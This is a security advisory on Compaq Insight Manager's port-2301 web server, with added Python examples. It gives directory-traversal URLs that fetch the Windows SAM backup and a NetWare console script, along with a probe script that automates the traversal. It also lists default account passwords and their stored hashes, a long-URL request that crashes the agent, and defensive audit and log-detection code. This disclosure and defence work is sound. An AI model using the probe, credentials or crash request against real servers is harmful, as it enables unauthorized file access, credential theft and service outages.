COMMAND
Compaq Insight Manager
SYSTEMS AFFECTED
WinNT and Novell Netware servers running on Compaq hardware
PROBLEM
The following is based on the Infosec Security Vulnerability Report by
Gabriel Sandberg. The web server included in Compaq Insight
Manager can expose sensitive information. Anyone who can reach
port 2301 on a host where Compaq Insight Manager is installed
can get unrestricted read access to the server's disk through the
"root dot dot" bug.
When Compaq Insight Manager is installed, a web server is installed
with it. This web server listens on port 2301 and is vulnerable to
the old "root dot dot" (directory traversal) bug, which gives
unrestricted read access to the vulnerable server's disk. It can be
exploited with one of these URLs:
http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf
(The number of "../" segments needed is install-dependent.) Infosec
credits Master Dogen with first reporting the problem.
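The probe below is an added example for this page, not code from the advisory or from Compaq. It walks increasing "../" depths against the two files the advisory names (the depth is install-dependent) and judges each reply by status code and body shape rather than by a 200 alone; the "file" verdict is a heuristic, so confirm by inspecting the body (sam._ is a compressed binary, ldremote.ncf a plain-text script).

```python
"""Probe a Compaq Insight Manager web agent on port 2301 for the
"root dot dot" traversal.  Added example, not code from the advisory or
from Compaq.  Walks depths 1..max_depth because the number of ../
segments needed is install-dependent."""
import http.client
import sys

PORT = 2301
TARGETS = {
    "nt": "winnt/repair/sam._",        # compressed backup of the SAM hive
    "netware": "system/ldremote.ncf",  # NetWare remote console loader script
}


def traversal_paths(target, max_depth=8):
    """Candidate request paths with 1..max_depth leading '../' segments."""
    return ["/" + "../" * depth + target for depth in range(1, max_depth + 1)]


def classify(status, body):
    """Verdict for one reply.
    'file'    200 whose body does not look like an HTML page (likely the file)
    'html'    200 but the agent served a page (login form, error page)
    'denied'  401/403, 'missing' 404, 'other' anything else"""
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "missing"
    if status != 200:
        return "other"
    head = body.lstrip()[:64].lower()
    if head.startswith(b"<") or b"<html" in head:
        return "html"
    return "file"


def fetch(host, path, timeout=5):
    """GET the raw path; http.client sends '../' segments unnormalised."""
    conn = http.client.HTTPConnection(host, PORT, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read(4096)
    finally:
        conn.close()


def probe(host, os_kind="nt", max_depth=8):
    """Walk the depths; return (depth, path) of the first 'file' verdict, else None."""
    for depth, path in enumerate(traversal_paths(TARGETS[os_kind], max_depth), 1):
        status, body = fetch(host, path)
        verdict = classify(status, body)
        print(f"depth={depth} status={status} verdict={verdict} path={path}")
        if verdict == "file":
            return depth, path
    return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit(f"usage: {sys.argv[0]} host [nt|netware]")
    hit = probe(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "nt")
    print("VULNERABLE at" if hit else "no traversal hit", hit or "")
```

Run it as "python probe.py 10.0.0.1 nt" (or "netware"); it stops at the first depth that returns something other than an HTML page. Raise max_depth if the agent is installed deep in the directory tree.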
Vacuum added the following. Web-Based Management is enabled by
default when you install the Compaq Server Management Agents for
Windows NT (CPQWMGMT.EXE). The web-enabled Compaq Server Management
Agents allow you to view subsystem and status information from a
web browser, either locally or remotely. Web-enabled Server
Management Agents are available in all 4.x versions of Insight
Manager. The embedded web server is Compaq HTTP Server Version
1.2.15 (Pre-Release). The only user accounts available in the Compaq
Server Management Agent WBEM release are listed below.
Login page: http://111.111.111.111:2301/cpqlogin.htm
account         username        password
anonymous       anonymous       (blank)
user            user            public
operator        operator        operator
administrator   administrator   administrator
http://111.111.111.111:2301/cpqlogin.htm?ChangePassword=yes
is the URL used to change a password. Unfortunately the password
is the only attribute that can be changed, and it is stored in some
kind of cipher text (two 32-character hexadecimal values per account)
in c:\compaq\wbem\cpqhmmd.acl:
Compaq-WBEM-AclFile, 1.1
anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F 7A21DD9917C0C23907267FC07DBC7D12
administrator administrator D6022D9B3FCA717CCEED36E640160478 51B02137D6BF719FC62F4940DBE1F3E6
operator operator B5CE548356D1BEA5F1CFEE12FE9502C3 041D1015AEC9F60412C7F86E62D6672C
user user EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A
Once one WBEM-enabled machine has been found, Compaq's HTTP
Auto-Discovery Device List (http://111.111.111.111:2301/cpqdev.htm)
makes it trivial to locate other machines.
There are three types of data:
Default(read only)
Sets(read/write)
Reboot(read/write)
The WebAgent.ini file in the system_root\CpqMgmt\WebAgent
directory specifies which level of user has access to each type of
data. The "read=" and "write=" entries in the file set the account
level required for access, where: 0=No access, 1=Anonymous, 2=User,
3=Operator, and 4=Administrator. Raising these levels restricts
access. The web-enabled Server Agent service must be stopped and
restarted for any change to take effect. Do not modify anything
except the read/write levels.
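An offline audit of the two files discussed above (the cpqhmmd.acl account list with its published default values, and the WebAgent.ini read/write levels), as an added example for this page rather than Compaq's code. It rests on two assumptions that are not verified against the product: that the stored .acl values are deterministic for a given password, so an entry still matching the values listed above is still using the shipped default; and that WebAgent.ini keeps one [section] per data type (Default, Sets, Reboot) holding the read= and write= keys. Both sample files are constructed.

```python
"""Offline audit of cpqhmmd.acl and WebAgent.ini.  Added example, not
Compaq's code.  Assumptions (unverified): .acl values are deterministic
per password; WebAgent.ini has one [section] per data type with read=/write=."""
import configparser

# Values listed in the advisory's dump of a default cpqhmmd.acl.
DEFAULT_ACL_VALUES = {
    "anonymous": ("737EEEFA7617ED94EDD74E659B83035F", "7A21DD9917C0C23907267FC07DBC7D12"),
    "administrator": ("D6022D9B3FCA717CCEED36E640160478", "51B02137D6BF719FC62F4940DBE1F3E6"),
    "operator": ("B5CE548356D1BEA5F1CFEE12FE9502C3", "041D1015AEC9F60412C7F86E62D6672C"),
    "user": ("EC286E733A8892ADFC895611D1557557", "C865DE636CA398F8523EDBE5700D457A"),
}
LEVELS = {0: "No access", 1: "Anonymous", 2: "User", 3: "Operator", 4: "Administrator"}


def _is_value(token):
    return len(token) == 32 and all(c in "0123456789abcdefABCDEF" for c in token)


def parse_acl(text):
    """Parse a Compaq-WBEM-AclFile into {account: (username, (value, ...))}.
    Lines holding only hex values continue the previous account, so both a
    one-line-per-account layout and a wrapped layout are accepted."""
    accounts, last = {}, None
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("Compaq-WBEM-AclFile"):
            continue
        if last and all(_is_value(p) for p in parts):
            accounts[last][1].extend(p.upper() for p in parts)
        else:
            last = parts[0]
            username = parts[1] if len(parts) > 1 else ""
            accounts[last] = (username, [p.upper() for p in parts[2:]])
    return {a: (u, tuple(v)) for a, (u, v) in accounts.items()}


def accounts_still_default(acl_text):
    """Sorted account names whose stored values equal the published defaults."""
    return sorted(a for a, (_, vals) in parse_acl(acl_text).items()
                  if DEFAULT_ACL_VALUES.get(a) == vals)


def weak_access_levels(ini_text):
    """Findings for WebAgent.ini: write= below Administrator, read= that
    admits Anonymous, or a level outside 0..4."""
    # A section literally named [DEFAULT] would otherwise be swallowed by
    # configparser's defaults mechanism; give that role an unused name.
    cfg = configparser.ConfigParser(default_section="__unused__", interpolation=None)
    cfg.read_string(ini_text)
    findings = []
    for section in cfg.sections():
        for key in ("read", "write"):
            if not cfg.has_option(section, key):
                continue
            level = cfg.getint(section, key)
            if level not in LEVELS:
                findings.append(f"{section}: {key}={level} is not a valid level (0-4)")
            elif key == "write" and level < 4:
                findings.append(f"{section}: write={level} ({LEVELS[level]}) lets non-administrators change data")
            elif key == "read" and level == 1:
                findings.append(f"{section}: read=1 ({LEVELS[1]}) exposes data to anonymous users")
    return findings


# Constructed sample: administrator has been changed, the other three have not.
SAMPLE_ACL = """Compaq-WBEM-AclFile, 1.1
anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F 7A21DD9917C0C23907267FC07DBC7D12
administrator administrator 0123456789ABCDEF0123456789ABCDEF FEDCBA9876543210FEDCBA9876543210
operator operator B5CE548356D1BEA5F1CFEE12FE9502C3
041D1015AEC9F60412C7F86E62D6672C
user user
EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A
"""

# Constructed sample in the assumed layout: Sets is writable by operators.
SAMPLE_INI = """[Default]
read=1
write=4
[Sets]
read=2
write=3
[Reboot]
read=4
write=4
"""

if __name__ == "__main__":
    print("still default:", accounts_still_default(SAMPLE_ACL))
    for finding in weak_access_levels(SAMPLE_INI):
        print("weak:", finding)
```

Point the two functions at the real files (read them from c:\compaq\wbem\cpqhmmd.acl and system_root\CpqMgmt\WebAgent\WebAgent.ini) after changing passwords and levels, and remember the service restart before re-checking the levels.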
There is also a denial of service:
http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the minimum)
The first time this is requested, an application error occurs in
surveyor.exe (Exception: access violation (0xc0000005), Address:
0x100333e5). If you restart the Insight Web Agent Service and
repeat the request, it causes an application error in cpqwmget.exe
(Exception: access violation (0xc0000005), Address: 0x002486d4).
http://111.111.111.111:2301 will then no longer respond until the
service is stopped and restarted.
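Detection rules for the two abuse patterns described above against the port-2301 agent (the "../" traversal toward the named files and the overlong path that crashes surveyor.exe / cpqwmget.exe), as an added example for this page rather than anything from the advisory. The page does not document the Compaq HTTP server's own log format, so the sample lines are constructed in a generic 'client - "METHOD path HTTP/1.x" status' shape; adapt LINE_RE to the real one.

```python
"""Detection over request-log lines for the port-2301 agent: dot-dot
traversal and the overlong-path crash.  Added example; the log format is
constructed, not the Compaq server's documented format."""
import re
from urllib.parse import unquote

LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
MIN_CRASH_LEN = 223  # smallest run of A's reported to crash the agent
TARGET_FILES = ("sam._", "ldremote.ncf")


def alerts_for(path):
    """Names of the rules that one request path trips (possibly empty)."""
    alerts = []
    decoded = unquote(path)  # also catches %2e%2e / %2f encoded forms
    if ".." in re.split(r"[\\/]", decoded):
        alerts.append("dot-dot traversal")
    if decoded.lower().endswith(TARGET_FILES):
        alerts.append("known target file")
    if len(path.lstrip("/")) >= MIN_CRASH_LEN:
        alerts.append("overlong path (possible agent crash)")
    return alerts


def scan(log_text):
    """(client, status, path, alerts) for every line that trips a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        alerts = alerts_for(m["path"])
        if alerts:
            hits.append((m["client"], int(m["status"]), m["path"], alerts))
    return hits


# Constructed sample: one normal login-page hit, two traversal attempts
# (one URL-encoded), and the crash request at exactly the reported minimum.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - "GET /cpqlogin.htm HTTP/1.0" 200',
    '10.0.0.9 - "GET /../../../winnt/repair/sam._ HTTP/1.0" 200',
    '10.0.0.9 - "GET /%2e%2e/%2e%2e/system/ldremote.ncf HTTP/1.0" 200',
    '10.0.0.9 - "GET /' + "A" * MIN_CRASH_LEN + ' HTTP/1.0" 500',
])

if __name__ == "__main__":
    for client, status, path, alerts in scan(SAMPLE_LOG):
        print(f"{client} {status} {path[:40]:<40} {', '.join(alerts)}")
```

The traversal rule splits on both slash styles after URL-decoding so that "%2e%2e" and backslash variants are caught; the length rule measures the path without its leading slash because the advisory counts the A's, not the whole URL.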
SOLUTION
You could probably fix the problem by restricting anonymous access
to the Compaq Insight Manager web server. If you are not using the
web server, Infosec recommends disabling the service. To
completely remove the problem, also stop the "surveyor" service if
you have it installed. That completely shuts off access to port
2301 and plugs the hole; confirm with "netstat -an" that nothing is
still listening on TCP port 2301.